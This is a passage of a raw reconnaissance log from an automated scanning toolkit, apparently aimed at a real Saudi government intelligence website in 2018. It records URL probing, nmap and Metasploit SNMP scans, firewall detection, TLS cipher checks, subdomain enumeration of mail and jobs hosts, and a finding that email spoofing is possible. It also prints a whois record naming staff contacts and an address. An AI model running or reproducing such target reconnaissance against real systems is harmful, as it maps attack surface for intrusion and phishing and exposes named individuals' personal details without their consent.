  1226. |_[ + ] Target:: [ https://gip.gov.sa/en/news7.html ]
  1227. |_[ + ] Exploit::
  1228. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET, IP:212.138.117.71:443
  1229. |_[ + ] More details:: / - / , ISP:
  1230. |_[ + ] Found:: UNIDENTIFIED
  1231.  
  1232. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1233. |_[ + ] [ 72 / 100 ]-[15:20:15] [ - ]
  1234. |_[ + ] Target:: [ https://www.gip.gov.sa/pages/jobs.aspx، ]
  1235. |_[ + ] Exploit::
  1236. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET, IP:212.138.117.71:443
  1237. |_[ + ] More details:: / - / , ISP:
  1238. |_[ + ] Found:: UNIDENTIFIED
  1239.  
  1240. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1241. |_[ + ] [ 73 / 100 ]-[15:20:21] [ - ]
  1242. |_[ + ] Target:: [ https://www.gip.gov.sa/Home/Page/Vision ]
  1243. |_[ + ] Exploit::
  1244. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  1245. |_[ + ] More details:: / - / , ISP:
  1246. |_[ + ] Found:: UNIDENTIFIED
  1247. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1248.  
  1249. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1250. |_[ + ] [ 74 / 100 ]-[15:20:27] [ - ]
  1251. |_[ + ] Target:: [ https://gip.gov.sa/en/news1.html ]
  1252. |_[ + ] Exploit::
  1253. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  1254. |_[ + ] More details:: / - / , ISP:
  1255. |_[ + ] Found:: UNIDENTIFIED
  1256. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1257.  
  1258. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1259. |_[ + ] [ 75 / 100 ]-[15:20:32] [ - ]
  1260. |_[ + ] Target:: [ https://www.gip.gov.sa/en/news13.html ]
  1261. |_[ + ] Exploit::
  1262. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET, IP:212.138.117.71:443
  1263. |_[ + ] More details:: / - / , ISP:
  1264. |_[ + ] Found:: UNIDENTIFIED
  1265.  
  1266. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1267. |_[ + ] [ 76 / 100 ]-[15:20:38] [ - ]
  1268. |_[ + ] Target:: [ https://www.gip.gov.sa/forms/3.pdf ]
  1269. |_[ + ] Exploit::
  1270. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  1271. |_[ + ] More details:: / - / , ISP:
  1272. |_[ + ] Found:: UNIDENTIFIED
  1273. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1274.  
  1275. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1276. |_[ + ] [ 77 / 100 ]-[15:20:44] [ - ]
  1277. |_[ + ] Target:: [ https://gip.gov.sa/ContactUs/Pages/Contactus.aspx ]
  1278. |_[ + ] Exploit::
  1279. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  1280. |_[ + ] More details:: / - / , ISP:
  1281. |_[ + ] Found:: UNIDENTIFIED
  1282. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1283.  
  1284. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1285. |_[ + ] [ 78 / 100 ]-[15:20:49] [ - ]
  1286. |_[ + ] Target:: [ https://gip.gov.sa/_layouts/jobsystemgip/ReferenceKey.aspx ]
  1287. |_[ + ] Exploit::
  1288. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET, IP:212.138.117.71:443
  1289. |_[ + ] More details:: / - / , ISP:
  1290. |_[ + ] Found:: UNIDENTIFIED
  1291.  
  1292. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1293. |_[ + ] [ 79 / 100 ]-[15:20:55] [ - ]
  1294. |_[ + ] Target:: [ https://www.gip.gov.sa/News/Pages/سمورئيسالاستخباراتالعامةيزورمركزالقيادةوالسيطرةبمنى.aspx ]
  1295. |_[ + ] Exploit::
  1296. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  1297. |_[ + ] More details:: / - / , ISP:
  1298. |_[ + ] Found:: UNIDENTIFIED
  1299. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1300.  
  1301. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1302. |_[ + ] [ 80 / 100 ]-[15:21:01] [ - ]
  1303. |_[ + ] Target:: [ https://www.gip.gov.sa/jobapplication/pages/default.aspx ]
  1304. |_[ + ] Exploit::
  1305. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  1306. |_[ + ] More details:: / - / , ISP:
  1307. |_[ + ] Found:: UNIDENTIFIED
  1308. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1309.  
  1310. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1311. |_[ + ] [ 81 / 100 ]-[15:21:06] [ - ]
  1312. |_[ + ] Target:: [ https://www.gip.gov.sa/INQUIRY/Pages/default.aspx ]
  1313. |_[ + ] Exploit::
  1314. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET, IP:212.138.117.71:443
  1315. |_[ + ] More details:: / - / , ISP:
  1316. |_[ + ] Found:: UNIDENTIFIED
  1317.  
  1318. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1319. |_[ + ] [ 82 / 100 ]-[15:21:12] [ - ]
  1320. |_[ + ] Target:: [ https://www.gip.gov.sa/_layouts/jobsystemGIP/home.aspx ]
  1321. |_[ + ] Exploit::
  1322. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  1323. |_[ + ] More details:: / - / , ISP:
  1324. |_[ + ] Found:: UNIDENTIFIED
  1325. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1326.  
  1327. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1328. |_[ + ] [ 83 / 100 ]-[15:21:18] [ - ]
  1329. |_[ + ] Target:: [ https://gip.gov.sa/PreviousPresidency/Pages/Home.aspx ]
  1330. |_[ + ] Exploit::
  1331. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  1332. |_[ + ] More details:: / - / , ISP:
  1333. |_[ + ] Found:: UNIDENTIFIED
  1334. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1335.  
  1336. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1337. |_[ + ] [ 84 / 100 ]-[15:21:22] [ - ]
  1338. |_[ + ] Target:: [ https://gip.gov.sa/News/Pages/أمرملكيإعفاءالأميرمقرنوتعيينهمستشاراًومبعوثاًخاصاًلخادمالحرمينوالأميربندربنسلطانرئيساًللاستخباراتالعامة.aspx ]
  1339. |_[ + ] Exploit::
  1340. |_[ + ] Information Server:: HTTP/1.1 400 Bad Request, Server: Microsoft-HTTPAPI/2.0 , IP:212.138.117.71:443
  1341. |_[ + ] More details:: / - / , ISP:
  1342. |_[ + ] Found:: UNIDENTIFIED
  1343.  
  1344. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1345. |_[ + ] [ 85 / 100 ]-[15:21:28] [ - ]
  1346. |_[ + ] Target:: [ https://www.gip.gov.sa/News/Pages/الأميرمقرنإخلاءالمنطقةمنالنوويضرورة.aspx ]
  1347. |_[ + ] Exploit::
  1348. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  1349. |_[ + ] More details:: / - / , ISP:
  1350. |_[ + ] Found:: UNIDENTIFIED
  1351. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1352.  
  1353. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1354. |_[ + ] [ 86 / 100 ]-[15:21:34] [ - ]
  1355. |_[ + ] Target:: [ https://www.gip.gov.sa/pages/jobs.aspx:tsfiq: ]
  1356. |_[ + ] Exploit::
  1357. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  1358. |_[ + ] More details:: / - / , ISP:
  1359. |_[ + ] Found:: UNIDENTIFIED
  1360. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1361.  
  1362. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1363. |_[ + ] [ 87 / 100 ]-[15:21:41] [ - ]
  1364. |_[ + ] Target:: [ https://www.gip.gov.sa/AboutPresidency/Pages/History.aspx ]
  1365. |_[ + ] Exploit::
  1366. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  1367. |_[ + ] More details:: / - / , ISP:
  1368. |_[ + ] Found:: UNIDENTIFIED
  1369. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1370.  
  1371. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1372. |_[ + ] [ 88 / 100 ]-[15:21:46] [ - ]
  1373. |_[ + ] Target:: [ https://gip.gov.sa/ScriptResource.axd?d=8bj_L6GjC_ ]
  1374. |_[ + ] Exploit::
  1375. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET, IP:212.138.117.71:443
  1376. |_[ + ] More details:: / - / , ISP:
  1377. |_[ + ] Found:: UNIDENTIFIED
  1378.  
  1379. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1380. |_[ + ] [ 89 / 100 ]-[15:21:51] [ - ]
  1381. |_[ + ] Target:: [ https://gip.gov.sa/PortalDocumentaion/Pages/UsagePolicy.aspx ]
  1382. |_[ + ] Exploit::
  1383. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET, IP:212.138.117.71:443
  1384. |_[ + ] More details:: / - / , ISP:
  1385. |_[ + ] Found:: UNIDENTIFIED
  1386.  
  1387. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1388. |_[ + ] [ 90 / 100 ]-[15:21:57] [ - ]
  1389. |_[ + ] Target:: [ https://www.gip.gov.sa/News/Pages/News1200.aspx ]
  1390. |_[ + ] Exploit::
  1391. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET, IP:212.138.117.71:443
  1392. |_[ + ] More details:: / - / , ISP:
  1393. |_[ + ] Found:: UNIDENTIFIED
  1394.  
  1395. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1396. |_[ + ] [ 91 / 100 ]-[15:22:03] [ - ]
  1397. |_[ + ] Target:: [ https://www.gip.gov.sa/AboutPresidency/Pages/AboutPresident.aspx ]
  1398. |_[ + ] Exploit::
  1399. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  1400. |_[ + ] More details:: / - / , ISP:
  1401. |_[ + ] Found:: UNIDENTIFIED
  1402. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1403.  
  1404. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1405. |_[ + ] [ 92 / 100 ]-[15:22:09] [ - ]
  1406. |_[ + ] Target:: [ https://gip.gov.sa/PortalDocumentaion/Pages/PrivacyPolicy.aspx ]
  1407. |_[ + ] Exploit::
  1408. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  1409. |_[ + ] More details:: / - / , ISP:
  1410. |_[ + ] Found:: UNIDENTIFIED
  1411. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1412.  
  1413. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1414. |_[ + ] [ 93 / 100 ]-[15:22:15] [ - ]
  1415. |_[ + ] Target:: [ https://www.gip.gov.sa/GovernmentOrganization/Pages/Home.aspx ]
  1416. |_[ + ] Exploit::
  1417. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET, IP:212.138.117.71:443
  1418. |_[ + ] More details:: / - / , ISP:
  1419. |_[ + ] Found:: UNIDENTIFIED
  1420.  
  1421. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1422. |_[ + ] [ 94 / 100 ]-[15:22:21] [ - ]
  1423. |_[ + ] Target:: [ https://www.gip.gov.sa/News/Pages/politicalunrest.aspx ]
  1424. |_[ + ] Exploit::
  1425. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  1426. |_[ + ] More details:: / - / , ISP:
  1427. |_[ + ] Found:: UNIDENTIFIED
  1428. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1429.  
  1430. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1431. |_[ + ] [ 95 / 100 ]-[15:22:27] [ - ]
  1432. |_[ + ] Target:: [ https://www.gip.gov.sa/News/Pages/الأميربندربنسلطانيشكرخادمالحرمينالشريفين.aspx ]
  1433. |_[ + ] Exploit::
  1434. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  1435. |_[ + ] More details:: / - / , ISP:
  1436. |_[ + ] Found:: UNIDENTIFIED
  1437. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1438.  
  1439. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1440. |_[ + ] [ 96 / 100 ]-[15:22:33] [ - ]
  1441. |_[ + ] Target:: [ https://www.gip.gov.sa/sites/english/Pages/de ]
  1442. |_[ + ] Exploit::
  1443. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  1444. |_[ + ] More details:: / - / , ISP:
  1445. |_[ + ] Found:: UNIDENTIFIED
  1446. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1447.  
  1448. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1449. |_[ + ] [ 97 / 100 ]-[15:22:38] [ - ]
  1450. |_[ + ] Target:: [ https://www.gip.gov.sa/AboutPresidency/Pages/Home.aspx ]
  1451. |_[ + ] Exploit::
  1452. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET, IP:212.138.117.71:443
  1453. |_[ + ] More details:: / - / , ISP:
  1454. |_[ + ] Found:: UNIDENTIFIED
  1455.  
  1456. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1457. |_[ + ] [ 98 / 100 ]-[15:22:43] [ - ]
  1458. |_[ + ] Target:: [ https://www.gip.gov.sa/Lists/List1/contact.aspx ]
  1459. |_[ + ] Exploit::
  1460. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET, IP:212.138.117.71:443
  1461. |_[ + ] More details:: / - / , ISP:
  1462. |_[ + ] Found:: UNIDENTIFIED
  1463.  
  1464. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1465. |_[ + ] [ 99 / 100 ]-[15:22:49] [ - ]
  1466. |_[ + ] Target:: [ https://www.gip.gov.sa/fonts/Cairo-Bold.ttf ]
  1467. |_[ + ] Exploit::
  1468. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET, IP:212.138.117.71:443
  1469. |_[ + ] More details:: / - / , ISP:
  1470. |_[ + ] Found:: UNIDENTIFIED
  1471.  
  1472. [ INFO ] [ Shutting down ]
  1473. [ INFO ] [ End of process INURLBR at [21-10-2018 15:22:49]
  1474. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
  1475. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-gip.gov.sa.txt ]
  1476. |_________________________________________________________________________________________
  1477.  
  1478. \_________________________________________________________________________________________/
  1479.  
  1480. + -- --=[Port 110 closed... skipping.
  1481. + -- --=[Port 111 closed... skipping.
  1482. + -- --=[Port 123 opened... running tests...
  1483. Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-21 15:22 EDT
  1484. NSE: failed to initialize the script engine:
  1485. /usr/bin/../share/nmap/nse_main.lua:823: 'ntp-*' did not match a category, filename, or directory
  1486. stack traceback:
  1487. [C]: in function 'error'
  1488. /usr/bin/../share/nmap/nse_main.lua:823: in local 'get_chosen_scripts'
  1489. /usr/bin/../share/nmap/nse_main.lua:1315: in main chunk
  1490. [C]: in ?
  1491.  
  1492. QUITTING!
  1493. + -- --=[Port 135 closed... skipping.
  1494. + -- --=[Port 137 closed... skipping.
  1495. + -- --=[Port 139 closed... skipping.
  1496. + -- --=[Port 161 opened... running tests...
  1497. Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-21 15:22 EDT
  1498. Nmap scan report for gip.gov.sa (212.138.117.71)
  1499. Host is up (1.4s latency).
  1500.  
  1501. PORT STATE SERVICE VERSION
  1502. 161/tcp filtered snmp
  1503. 161/udp open|filtered snmp
  1504. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  1505. Device type: general purpose
  1506. Running: Microsoft Windows XP
  1507. OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3
  1508. OS details: Microsoft Windows XP SP2 or SP3
  1509.  
  1510. TRACEROUTE (using proto 1/icmp)
  1511. HOP RTT ADDRESS
  1512. 1 ... 30
  1513.  
  1514. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1515. Nmap done: 1 IP address (1 host up) scanned in 234.26 seconds
  1516.  
  1517.  
  1518. .~+P``````-o+:. -o+:.
  1519. .+oooyysyyssyyssyddh++os-````` ``````````````` `
  1520. +++++++++++++++++++++++sydhyoyso/:.````...`...-///::+ohhyosyyosyy/+om++:ooo///o
  1521. ++++///////~~~~///////++++++++++++++++ooyysoyysosso+++++++++++++++++++///oossosy
  1522. --.` .-.-...-////+++++++++++++++////////~~//////++++++++++++///
  1523. `...............` `...-/////...`
  1524.  
  1525.  
  1526. .::::::::::-. .::::::-
  1527. .hmMMMMMMMMMMNddds\...//M\\.../hddddmMMMMMMNo
  1528. :Nm-/NMMMMMMMMMMMMM$$NMMMMm&&MMMMMMMMMMMMMMy
  1529. .sm/`-yMMMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMMh`
  1530. -Nd` :MMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMh`
  1531. -Nh` .yMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMm/
  1532. `oo/``-hd: `` .sNd :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMm/
  1533. .yNmMMh//+syysso-`````` -mh` :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMd
  1534. .shMMMMN//dmNMMMMMMMMMMMMs` `:```-o++++oooo+:/ooooo+:+o+++oooo++/
  1535. `///omh//dMMMMMMMMMMMMMMMN/:::::/+ooso--/ydh//+s+/ossssso:--syN///os:
  1536. /MMMMMMMMMMMMMMMMMMd. `/++-.-yy/...osydh/-+oo:-`o//...oyodh+
  1537. -hMMmssddd+:dMMmNMMh. `.-=mmk.//^^^\\.^^`:++:^^o://^^^\\`::
  1538. .sMMmo. -dMd--:mN/` ||--X--|| ||--X--||
  1539. ........../yddy/:...+hmo-...hdd:............\\=v=//............\\=v=//.........
  1540. ================================================================================
  1541. =====================+--------------------------------+=========================
  1542. =====================| Session one died of dysentery. |=========================
  1543. =====================+--------------------------------+=========================
  1544. ================================================================================
  1545.  
  1546. Press ENTER to size up the situation
  1547.  
  1548. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  1549. %%%%%%%%%%%%%%%%%%%%%%%%%%%%% Date: April 25, 1848 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  1550. %%%%%%%%%%%%%%%%%%%%%%%%%% Weather: It's always cool in the lab %%%%%%%%%%%%%%%%
  1551. %%%%%%%%%%%%%%%%%%%%%%%%%%% Health: Overweight %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  1552. %%%%%%%%%%%%%%%%%%%%%%%%% Caffeine: 12975 mg %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  1553. %%%%%%%%%%%%%%%%%%%%%%%%%%% Hacked: All the things %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  1554. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  1555.  
  1556. Press SPACE BAR to continue
  1557.  
  1558.  
  1559.  
  1560. =[ metasploit v4.17.18-dev ]
  1561. + -- --=[ 1818 exploits - 1031 auxiliary - 315 post ]
  1562. + -- --=[ 539 payloads - 42 encoders - 10 nops ]
  1563. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  1564.  
  1565. RHOSTS => gip.gov.sa
  1566. [-] 212.138.117.71 SNMP request timeout.
  1567. [*] Scanned 1 of 1 hosts (100% complete)
  1568. [*] Auxiliary module execution completed
  1569. #######################################################################################################################################
  1570.  
  1571. ^ ^
  1572. _ __ _ ____ _ __ _ _ ____
  1573. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  1574. | V V // o // _/ | V V // 0 // 0 // _/
  1575. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  1576. <
  1577. ...'
  1578.  
  1579. WAFW00F - Web Application Firewall Detection Tool
  1580.  
  1581. By Sandro Gauci && Wendel G. Henrique
  1582.  
  1583. Checking https://gip.gov.sa
  1584. Generic Detection results:
  1585. The site https://gip.gov.sa seems to be behind a WAF or some sort of security solution
  1586. Reason: The server header is different when an attack is detected.
  1587. The server header for a normal response is "Microsoft-IIS/8.5", while the server header a response to an attack is "Microsoft-HTTPAPI/2.0.",
  1588. Number of requests: 13
  1589. #######################################################################################################################################
  1590.  
  1591.  
  1592.  
  1593. AVAILABLE PLUGINS
  1594. -----------------
  1595.  
  1596. PluginSessionRenegotiation
  1597. PluginChromeSha1Deprecation
  1598. PluginHeartbleed
  1599. PluginCertInfo
  1600. PluginOpenSSLCipherSuites
  1601. PluginHSTS
  1602. PluginCompression
  1603. PluginSessionResumption
  1604.  
  1605.  
  1606.  
  1607. CHECKING HOST(S) AVAILABILITY
  1608. -----------------------------
  1609.  
  1610. gip.gov.sa:443 => 212.138.117.71:443
  1611.  
  1612.  
  1613.  
  1614. SCAN RESULTS FOR GIP.GOV.SA:443 - 212.138.117.71:443
  1615. ----------------------------------------------------
  1616.  
  1617. * Session Renegotiation:
  1618. Client-initiated Renegotiations: OK - Rejected
  1619. Secure Renegotiation: OK - Supported
  1620.  
  1621. * Certificate - Content:
  1622. SHA1 Fingerprint: dcd6270e4668c89fec9f8e82212452cbdee3b19b
  1623. Common Name: *.gip.gov.sa
  1624. Issuer: DigiCert SHA2 Secure Server CA
  1625. Serial Number: 0EA1625D8313654FFC438CCB917ECB83
  1626. Not Before: Aug 30 00:00:00 2018 GMT
  1627. Not After: Oct 11 12:00:00 2019 GMT
  1628. Signature Algorithm: sha256WithRSAEncryption
  1629. Public Key Algorithm: rsaEncryption
  1630. Key Size: 2048 bit
  1631. Exponent: 65537 (0x10001)
  1632. X509v3 Subject Alternative Name: {'DNS': ['*.gip.gov.sa', 'gip.gov.sa']}
  1633.  
  1634. * Certificate - Trust:
  1635. Hostname Validation: OK - Subject Alternative Name matches
  1636. Google CA Store (09/2015): OK - Certificate is trusted
  1637. Java 6 CA Store (Update 65): OK - Certificate is trusted
  1638. Microsoft CA Store (09/2015): OK - Certificate is trusted
  1639. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
  1640. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
  1641. Certificate Chain Received: ['*.gip.gov.sa', 'DigiCert SHA2 Secure Server CA']
  1642.  
  1643. * Certificate - OCSP Stapling:
  1644. OCSP Response Status: successful
  1645. Validation w/ Mozilla's CA Store: OK - Response is trusted
  1646. Responder Id: 0F80611C823161D52F28E78D4638B42CE1C6D9E2
  1647. Cert Status: good
  1648. Cert Serial Number: 0EA1625D8313654FFC438CCB917ECB83
  1649. This Update: Oct 15 21:42:13 2018 GMT
  1650. Next Update: Oct 22 20:57:13 2018 GMT
  1651.  
  1652. * Session Resumption:
  1653. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
  1654. With TLS Session Tickets: NOT SUPPORTED - TLS ticket not assigned.
  1655.  
  1656. Unhandled exception when processing --compression:
  1657. socket.timeout - timed out
  1658.  
  1659. * SSLV2 Cipher Suites:
  1660. Server rejected all cipher suites.
  1661.  
  1662. * SSLV3 Cipher Suites:
  1663. Undefined - An unexpected error happened:
  1664. ECDH-RSA-NULL-SHA timeout - timed out
  1665. ECDH-ECDSA-NULL-SHA timeout - timed out
  1666. DH-DSS-AES256-SHA timeout - timed out
  1667.  
  1668.  
  1669.  
  1670. SCAN COMPLETED IN 62.15 S
  1671. -------------------------
  1672. Version: 1.11.12-static
  1673. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  1674.  
  1675. Connected to 212.138.117.71
  1676.  
  1677. Testing SSL server gip.gov.sa on port 443 using SNI name gip.gov.sa
  1678.  
  1679. TLS Fallback SCSV:
  1680. Server does not support TLS Fallback SCSV
  1681.  
  1682. TLS renegotiation:
  1683. Session renegotiation not supported
  1684.  
  1685. TLS Compression:
  1686. Compression disabled
  1687.  
  1688. Heartbleed:
  1689. TLS 1.2 not vulnerable to heartbleed
  1690. TLS 1.1 not vulnerable to heartbleed
  1691. TLS 1.0 not vulnerable to heartbleed
  1692.  
  1693. Supported Server Cipher(s):
  1694. Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-521 DHE 521
  1695. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-521 DHE 521
  1696. Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-521 DHE 521
  1697. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-521 DHE 521
  1698. Accepted TLSv1.1 256 bits AES256-SHA
  1699. Accepted TLSv1.1 128 bits AES128-SHA
  1700.  
  1701. SSL Certificate:
  1702. Signature Algorithm: sha256WithRSAEncryption
  1703. RSA Key Strength: 2048
  1704.  
  1705. Subject: *.gip.gov.sa
  1706. Altnames: DNS:*.gip.gov.sa, DNS:gip.gov.sa
  1707. Issuer: DigiCert SHA2 Secure Server CA
  1708.  
  1709. Not valid before: Aug 30 00:00:00 2018 GMT
  1710. Not valid after: Oct 11 12:00:00 2019 GMT
  1711.  
  1712. #######################################################################################################################################
  1713.  
  1714. % SaudiNIC Whois server.
  1715. % Rights restricted by copyright.
  1716. % http://nic.sa/en/view/whois-cmd-copyright
  1717.  
  1718. Domain Name: gip.gov.sa
  1719.  
  1720. Registrant:
  1721. General Intelligence Presidency رئاسة الإستخبارات العامة (مركز المعلومات)
  1722. Address: لا يوجد
  1723. Riyadh الرياض
  1724. Saudi Arabia المملكة العربية السعودية
  1725.  
  1726. Administrative Contact:
  1727. مسفر محمد سعيد القحطاني
  1728. Address: االرياض حي النخيل طريق الامام تركي مخرج 2
  1729. 11741 الرياض
  1730. Saudi Arabia
  1731.  
  1732. Technical Contact:
  1733. Eyad Yousef اياد يوسف
  1734. Address: لا يوجد
  1735. لا يوجد Riyadh الرياض
  1736. Saudi Arabia المملكة العربية السعودية
  1737.  
  1738. Name Servers:
  1739. gip-ns1.isu.net.sa
  1740. gip-ns2.isu.net.sa
  1741.  
  1742. Created on: 2007-11-06
  1743. Last Updated on: 2016-08-22
  1744. #######################################################################################################################################
  1745. [-] Enumerating subdomains now for gip.gov.sa
  1746. [-] verbosity is enabled, will show the subdomains results in realtime
  1747. [-] Searching now in Baidu..
  1748. [-] Searching now in Yahoo..
  1749. [-] Searching now in Google..
  1750. [-] Searching now in Bing..
  1751. [-] Searching now in Ask..
  1752. [-] Searching now in Netcraft..
  1753. [-] Searching now in DNSdumpster..
  1754. [-] Searching now in Virustotal..
  1755. [-] Searching now in ThreatCrowd..
  1756. [-] Searching now in SSL Certificates..
  1757. [-] Searching now in PassiveDNS..
  1758. SSL Certificates: webmail.gip.gov.sa
  1759. SSL Certificates: www.gip.gov.sa
  1760. SSL Certificates: autodiscover.gip.gov.sa
  1761. SSL Certificates: gip-mail.gip.gov.sa
  1762. SSL Certificates: mail.gip.gov.sa
  1763. SSL Certificates: jobs.gip.gov.sa
  1764. ThreatCrowd: www.gip.gov.sa
  1765. Virustotal: www.gip.gov.sa
  1766. Virustotal: webmail.gip.gov.sa
  1767. Virustotal: jobs.gip.gov.sa
  1768. PassiveDNS: mail.gip.gov.sa
  1769. DNSdumpster: mx1.gip.gov.sa
  1770. DNSdumpster: webmail.gip.gov.sa
  1771. DNSdumpster: mx2.gip.gov.sa
  1772. DNSdumpster: www.gip.gov.sa
  1773. Yahoo: www.gip.gov.sa
  1774. #######################################################################################################################################
  1775. autodiscover.gip.gov.sa
  1776. *.gip.gov.sa
  1777. gip-mail.gip.gov.sa
  1778. jobs.gip.gov.sa
  1779. mail.gip.gov.sa
  1780. webmail.gip.gov.sa
  1781. www.gip.gov.sa
  1782. #######################################################################################################################################
  1783. [*] Found SPF record:
  1784. [*] v=spf1 mx -all
  1785. [*] SPF record contains an All item: -all
  1786. [*] No DMARC record found. Looking for organizational record
  1787. [+] No organizational DMARC record
  1788. [+] Spoofing possible for gip.gov.sa!
  1789. #######################################################################################################################################
  1790. __
  1791. ____ _____ ___ ______ _/ /_____ ____ ___
  1792. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
